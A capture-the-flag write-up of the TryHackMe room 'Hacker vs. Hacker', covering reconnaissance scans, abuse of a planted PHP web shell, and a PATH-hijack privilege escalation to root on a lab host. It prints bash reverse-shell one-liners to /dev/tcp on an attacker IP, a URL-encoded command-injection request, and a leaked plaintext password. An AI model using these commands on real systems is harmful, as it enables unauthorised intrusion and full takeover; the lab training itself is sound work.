TryHackMe - Hacker vs. Hacker
Introduction
This is a TryHackMe room which can be found at: Hacker vs. Hacker
Someone has compromised this server already! Can you get in and evade their countermeasures?
Reconnaissance & Scanning
Perform nmap scan to identify open ports and services.
- Command:
nmap -p- -T4 -v 10.10.156.143
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
geobour98@kali:~$ nmap -p- -T4 -v 10.10.156.143
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-22 21:48 EEST
Initiating Ping Scan at 21:48
Scanning 10.10.156.143 [2 ports]
Completed Ping Scan at 21:48, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:48
Completed Parallel DNS resolution of 1 host. at 21:48, 0.00s elapsed
Initiating Connect Scan at 21:48
Scanning 10.10.156.143 (10.10.156.143) [65535 ports]
Discovered open port 22/tcp on 10.10.156.143
Discovered open port 80/tcp on 10.10.156.143
Connect Scan Timing: About 39.43% done; ETC: 21:49 (0:00:48 remaining)
Completed Connect Scan at 21:49, 75.01s elapsed (65535 total ports)
Nmap scan report for 10.10.156.143 (10.10.156.143)
Host is up (0.065s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 75.16 seconds
- Command:
sudo nmap -A -p 22,80 -v 10.10.156.143
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
geobour98@kali:~$ sudo nmap -A -p 22,80 -v 10.10.156.143
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-22 21:50 EEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:50
Completed Parallel DNS resolution of 1 host. at 21:50, 0.00s elapsed
Initiating SYN Stealth Scan at 21:50
Scanning 10.10.156.143 (10.10.156.143) [2 ports]
Discovered open port 22/tcp on 10.10.156.143
Discovered open port 80/tcp on 10.10.156.143
Completed SYN Stealth Scan at 21:50, 0.10s elapsed (2 total ports)
Initiating Service scan at 21:50
Scanning 2 services on 10.10.156.143 (10.10.156.143)
Completed Service scan at 21:50, 6.21s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.156.143 (10.10.156.143)
Retrying OS detection (try #2) against 10.10.156.143 (10.10.156.143)
Initiating Traceroute at 21:50
Completed Traceroute at 21:50, 0.08s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:50
Completed Parallel DNS resolution of 1 host. at 21:50, 0.00s elapsed
NSE: Script scanning 10.10.156.143.
Initiating NSE at 21:50
Completed NSE at 21:50, 2.99s elapsed
Initiating NSE at 21:50
Completed NSE at 21:50, 0.27s elapsed
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Nmap scan report for 10.10.156.143 (10.10.156.143)
Host is up (0.066s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
| 256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_ 256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-favicon: Unknown favicon MD5: DD1493059959BA895A46C026C39C36EF
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 33.377 days (since Wed Jul 20 12:48:00 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 67.28 ms 10.8.0.1 (10.8.0.1)
2 66.56 ms 10.10.156.143 (10.10.156.143)
NSE: Script Post-scanning.
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.64 seconds
Raw packets sent: 56 (4.084KB) | Rcvd: 40 (3.056KB)
- Command:
gobuster dir -u http://10.10.156.143/ -x txt,html,php -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -t 40
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
geobour98@kali:~$ gobuster dir -u http://10.10.151.143/ -x txt,html,php -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -t 40
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.156.143/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2022/08/22 21:53:10 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 278]
/.htaccess.php (Status: 403) [Size: 278]
/.htpasswd.php (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/.htpasswd.txt (Status: 403) [Size: 278]
/.htaccess.txt (Status: 403) [Size: 278]
/.hta.txt (Status: 403) [Size: 278]
/.htpasswd.html (Status: 403) [Size: 278]
/.htaccess.html (Status: 403) [Size: 278]
/.hta.html (Status: 403) [Size: 278]
/.hta.php (Status: 403) [Size: 278]
/css (Status: 301) [Size: 312] [--> http://10.10.156.143/css/]
/cvs (Status: 301) [Size: 312] [--> http://10.10.156.143/cvs/]
/dist (Status: 301) [Size: 313] [--> http://10.10.156.143/dist/]
/images (Status: 301) [Size: 315] [--> http://10.10.156.143/images/]
/index.html (Status: 200) [Size: 3413]
/index.html (Status: 200) [Size: 3413]
/server-status (Status: 403) [Size: 278]
/upload.php (Status: 200) [Size: 552]
===============================================================
2022/08/22 21:54:06 Finished
===============================================================
After navigating to port 80 in a web browser, we see an interesting file upload functionality, but nothing happens when we try to upload a file. Then, we navigate to /upload.php and view it’s source code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Hacked! If you dont want me to upload my shell, do better at filtering!
<!-- seriously, dumb stuff:
$target_dir = "cvs/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
if (!strpos($target_file, ".pdf")) {
echo "Only PDF CVs are accepted.";
} else if (file_exists($target_file)) {
echo "This CV has already been uploaded!";
} else if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "Success! We will get back to you.";
} else {
echo "Something went wrong :|";
}
-->
Exploitation
A possible vulnerability on strpos() would be to upload a file with .pdf.php extension. But this doesn’t work too. Then we search for already uploaded files with this extension in cvs/ directory.
- Command:
gobuster dir -u http://10.10.156.143/cvs/ -x pdf.php -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -t 40
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
geobour98@kali:~$ gobuster dir -u http://10.10.156.143/cvs/ -x pdf.php -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -t 40
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.156.143/cvs/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: pdf.php
[+] Timeout: 10s
===============================================================
2022/08/22 21:59:29 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.htaccess.pdf.php (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htpasswd.pdf.php (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/.hta.pdf.php (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 26]
/shell.pdf.php (Status: 200) [Size: 18]
===============================================================
2022/08/22 21:59:57 Finished
===============================================================
Just try the basic parameter cmd to check for code execution. The URL is: http://10.10.156.143/cvs/shell.pdf.php?cmd=id and we do have code execution because the output is: uid=33(www-data) gid=33(www-data) groups=33(www-data). In order to get a reverse shell, we intercept that request with Burp proxy, send it to Repeater, and execute a bash reverse shell like the following: bash -c 'exec bash -i &>/dev/tcp/10.8.200.50/443 <&1', but it has to be URL-encoded.
The request in Burp should look like this:
1
2
3
4
5
6
7
8
9
10
11
GET /cvs/shell.pdf.php?cmd=bash+-c+'exec+bash+-i+%26>/dev/tcp/10.8.200.50/443+<%261' HTTP/1.1
Host: 10.10.186.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Open a netcat listener and we have reverse shell as www-data:
1
2
www-data@b2r:/var/www/html/cvs$ whoami
www-data
There is an interesting file .bash_history in user’s lachlan home directory (/home/lachlan), which contains the password of that user:
1
2
3
4
5
6
www-data@b2r:/home/lachlan$ cat .bash_history
./cve.sh
./cve-patch.sh
vi /etc/cron.d/persistence
echo -e "dHY5pzmNYoETv7SUaY\n[REDACTED]\n[REDACTED]" | passwd
ls -sf /dev/null /home/lachlan/.bash_history
Next, we become user lachlan with the found password.
- Command:
su lachlan
We can also read the first flag, user.txt:
1
2
lachlan@b2r:/home/lachlan$ cat user.txt
thm{[REDACTED]}
Privilege Escalation
After using the pspy tool in order to monitor processes without root permissions, we identified a process pkill running without absolute path.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
lachlan@b2r:/home/lachlan$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and
on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/08/22 19:22:17 CMD: UID=0 PID=95 |
2022/08/22 19:22:17 CMD: UID=0 PID=94 |
2022/08/22 19:22:17 CMD: UID=0 PID=93 |
2022/08/22 19:22:17 CMD: UID=0 PID=911 |
2022/08/22 19:22:17 CMD: UID=0 PID=91 |
2022/08/22 19:22:17 CMD: UID=0 PID=90 |
2022/08/22 19:22:17 CMD: UID=0 PID=9 |
2022/08/22 19:22:17 CMD: UID=0 PID=89 |
2022/08/22 19:22:17 CMD: UID=0 PID=88 |
2022/08/22 19:22:17 CMD: UID=0 PID=87 |
2022/08/22 19:22:17 CMD: UID=0 PID=86 |
2022/08/22 19:22:17 CMD: UID=0 PID=85 |
2022/08/22 19:22:17 CMD: UID=0 PID=84 |
2022/08/22 19:22:17 CMD: UID=0 PID=82 |
2022/08/22 19:22:17 CMD: UID=0 PID=81 |
2022/08/22 19:22:17 CMD: UID=0 PID=806 | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --w
ait-for-signal
2022/08/22 19:22:17 CMD: UID=0 PID=78 |
2022/08/22 19:22:17 CMD: UID=0 PID=779 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=0 PID=77 |
2022/08/22 19:22:17 CMD: UID=0 PID=76 |
2022/08/22 19:22:17 CMD: UID=0 PID=75 |
2022/08/22 19:22:17 CMD: UID=0 PID=74 |
2022/08/22 19:22:17 CMD: UID=0 PID=73 |
2022/08/22 19:22:17 CMD: UID=0 PID=726 | /usr/bin/ssm-agent-worker
2022/08/22 19:22:17 CMD: UID=0 PID=72 |
2022/08/22 19:22:17 CMD: UID=0 PID=71 |
2022/08/22 19:22:17 CMD: UID=0 PID=709 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2022/08/22 19:22:17 CMD: UID=0 PID=70 |
2022/08/22 19:22:17 CMD: UID=0 PID=69 |
2022/08/22 19:22:17 CMD: UID=0 PID=683 | /usr/sbin/ModemManager
2022/08/22 19:22:17 CMD: UID=0 PID=649 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2022/08/22 19:22:17 CMD: UID=0 PID=644 | /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220
2022/08/22 19:22:17 CMD: UID=0 PID=633 | /usr/sbin/atd -f
2022/08/22 19:22:17 CMD: UID=0 PID=630 | /usr/lib/udisks2/udisksd
2022/08/22 19:22:17 CMD: UID=0 PID=628 | /lib/systemd/systemd-logind
2022/08/22 19:22:17 CMD: UID=0 PID=623 | /usr/lib/snapd/snapd
2022/08/22 19:22:17 CMD: UID=104 PID=619 | /usr/sbin/rsyslogd -n -iNONE
2022/08/22 19:22:17 CMD: UID=0 PID=615 | /usr/lib/policykit-1/polkitd --no-debug
2022/08/22 19:22:17 CMD: UID=0 PID=611 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2022/08/22 19:22:17 CMD: UID=103 PID=602 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd
-activation --syslog-only
2022/08/22 19:22:17 CMD: UID=0 PID=6 |
2022/08/22 19:22:17 CMD: UID=0 PID=599 | /usr/sbin/cron -f
2022/08/22 19:22:17 CMD: UID=0 PID=593 | /usr/bin/amazon-ssm-agent
2022/08/22 19:22:17 CMD: UID=0 PID=592 | /usr/lib/accountsservice/accounts-daemon
2022/08/22 19:22:17 CMD: UID=101 PID=570 | /lib/systemd/systemd-resolved
2022/08/22 19:22:17 CMD: UID=100 PID=560 | /lib/systemd/systemd-networkd
2022/08/22 19:22:17 CMD: UID=102 PID=521 | /lib/systemd/systemd-timesyncd
2022/08/22 19:22:17 CMD: UID=0 PID=504 |
2022/08/22 19:22:17 CMD: UID=0 PID=503 |
2022/08/22 19:22:17 CMD: UID=0 PID=496 |
2022/08/22 19:22:17 CMD: UID=0 PID=494 |
2022/08/22 19:22:17 CMD: UID=0 PID=491 |
2022/08/22 19:22:17 CMD: UID=0 PID=483 | /sbin/multipathd -d -s
2022/08/22 19:22:17 CMD: UID=0 PID=482 |
2022/08/22 19:22:17 CMD: UID=0 PID=481 |
2022/08/22 19:22:17 CMD: UID=0 PID=480 |
2022/08/22 19:22:17 CMD: UID=0 PID=479 |
2022/08/22 19:22:17 CMD: UID=0 PID=4 |
2022/08/22 19:22:17 CMD: UID=0 PID=372 | /lib/systemd/systemd-udevd
2022/08/22 19:22:17 CMD: UID=0 PID=364 |
2022/08/22 19:22:17 CMD: UID=0 PID=343 | /lib/systemd/systemd-journald
2022/08/22 19:22:17 CMD: UID=0 PID=3 |
2022/08/22 19:22:17 CMD: UID=0 PID=269 |
2022/08/22 19:22:17 CMD: UID=0 PID=268 |
2022/08/22 19:22:17 CMD: UID=0 PID=2628 | /lib/systemd/systemd-udevd
2022/08/22 19:22:17 CMD: UID=0 PID=2624 |
2022/08/22 19:22:17 CMD: UID=1001 PID=2614 | ./pspy64
2022/08/22 19:22:17 CMD: UID=0 PID=2609 | /bin/sleep 51
2022/08/22 19:22:17 CMD: UID=0 PID=2608 | /bin/sleep 41
2022/08/22 19:22:17 CMD: UID=0 PID=2607 | /bin/sh -c /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:22:17 CMD: UID=0 PID=2606 | /bin/sleep 31
2022/08/22 19:22:17 CMD: UID=0 PID=2605 | /bin/sleep 21
2022/08/22 19:22:17 CMD: UID=0 PID=2602 | /bin/sh -c /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:22:17 CMD: UID=0 PID=2601 | /bin/sh -c /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:22:17 CMD: UID=0 PID=2600 | /bin/sh -c /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:22:17 CMD: UID=0 PID=2595 | /usr/sbin/CRON -f
2022/08/22 19:22:17 CMD: UID=0 PID=2594 | /usr/sbin/CRON -f
2022/08/22 19:22:17 CMD: UID=0 PID=2593 | /usr/sbin/CRON -f
2022/08/22 19:22:17 CMD: UID=0 PID=2592 | /usr/sbin/CRON -f
2022/08/22 19:22:17 CMD: UID=1001 PID=2455 | sh
2022/08/22 19:22:17 CMD: UID=0 PID=2452 |
2022/08/22 19:22:17 CMD: UID=1001 PID=2449 | (sd-pam)
2022/08/22 19:22:17 CMD: UID=1001 PID=2448 | /lib/systemd/systemd --user
2022/08/22 19:22:17 CMD: UID=33 PID=2436 | su lachlan
2022/08/22 19:22:17 CMD: UID=0 PID=23 |
2022/08/22 19:22:17 CMD: UID=0 PID=224 |
2022/08/22 19:22:17 CMD: UID=0 PID=22 |
2022/08/22 19:22:17 CMD: UID=0 PID=21 |
2022/08/22 19:22:17 CMD: UID=33 PID=2021 | bash -i
2022/08/22 19:22:17 CMD: UID=33 PID=2020 | sh -c bash -c 'exec bash -i &>/dev/tcp/10.8.200.50/443 <&1'
2022/08/22 19:22:17 CMD: UID=0 PID=20 |
2022/08/22 19:22:17 CMD: UID=0 PID=2 |
2022/08/22 19:22:17 CMD: UID=0 PID=1993 |
2022/08/22 19:22:17 CMD: UID=0 PID=198 |
2022/08/22 19:22:17 CMD: UID=0 PID=1976 |
2022/08/22 19:22:17 CMD: UID=0 PID=19 |
2022/08/22 19:22:17 CMD: UID=0 PID=18 |
2022/08/22 19:22:17 CMD: UID=0 PID=170 |
2022/08/22 19:22:17 CMD: UID=0 PID=17 |
2022/08/22 19:22:17 CMD: UID=0 PID=16 |
2022/08/22 19:22:17 CMD: UID=0 PID=1585 |
2022/08/22 19:22:17 CMD: UID=33 PID=1536 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=33 PID=1534 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=33 PID=1533 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=33 PID=1515 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=33 PID=1514 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=33 PID=1500 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=0 PID=15 |
2022/08/22 19:22:17 CMD: UID=33 PID=1490 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=33 PID=1478 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=33 PID=1468 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=0 PID=14 |
2022/08/22 19:22:17 CMD: UID=0 PID=13 |
2022/08/22 19:22:17 CMD: UID=0 PID=120 |
2022/08/22 19:22:17 CMD: UID=0 PID=12 |
2022/08/22 19:22:17 CMD: UID=33 PID=1171 | /usr/sbin/apache2 -k start
2022/08/22 19:22:17 CMD: UID=0 PID=11 |
2022/08/22 19:22:17 CMD: UID=0 PID=107 |
2022/08/22 19:22:17 CMD: UID=0 PID=104 |
2022/08/22 19:22:17 CMD: UID=0 PID=10 |
2022/08/22 19:22:17 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2022/08/22 19:22:22 CMD: UID=0 PID=2632 |
2022/08/22 19:22:32 CMD: UID=0 PID=2635 |
2022/08/22 19:22:37 CMD: UID=0 PID=2636 |
2022/08/22 19:22:42 CMD: UID=0 PID=2639 | pkill -9 -t pts/ptmx
2022/08/22 19:22:52 CMD: UID=0 PID=2642 |
2022/08/22 19:23:01 CMD: UID=0 PID=2648 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2647 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2646 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2645 | /usr/sbin/cron -f
2022/08/22 19:23:01 CMD: UID=0 PID=2644 | /usr/sbin/cron -f
2022/08/22 19:23:01 CMD: UID=0 PID=2643 | /usr/sbin/cron -f
2022/08/22 19:23:01 CMD: UID=0 PID=2650 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2649 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2651 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2652 | /bin/sh -c /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:23:01 CMD: UID=0 PID=2654 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2653 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2655 | /bin/sh -c /bin/sleep 1 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:23:01 CMD: UID=0 PID=2656 | /bin/sh -c /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:23:01 CMD: UID=0 PID=2657 | /bin/sh -c /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:23:01 CMD: UID=0 PID=2659 | /usr/sbin/CRON -f
2022/08/22 19:23:01 CMD: UID=0 PID=2658 | /bin/sh -c /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope
> /dev/pts/$f && pkill -9 -t pts/$f; done
2022/08/22 19:23:01 CMD: UID=0 PID=2660 | /bin/sleep 51
2022/08/22 19:23:02 CMD: UID=0 PID=2663 | pkill -9 -t pts/ptmx
Then we can modify PATH variable, in order to prepend /home/lachlan/bin, so we can create a malicious file named pkill, which will be executed from our location first.
1
2
3
4
lachlan@b2r:/home/lachlan/bin$ export PATH=/home/lachlan/bin:$PATH
lachlan@b2r:/home/lachlan/bin$ echo $PATH
/home/lachlan/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
lachlan@b2r:/home/lachlan/bin$ echo "bash -c 'exec bash -i &>/dev/tcp/10.8.200.50/444 <&1'" > pkill
Then open another netcat listener and after a while the process pkill is executed with our file we get a root reverse shell.
1
2
root@b2r:~# cat root.txt
thm{[REDACTED]}
Proof of Concept (PoC image):
This post is licensed under CC BY 4.0 by the author.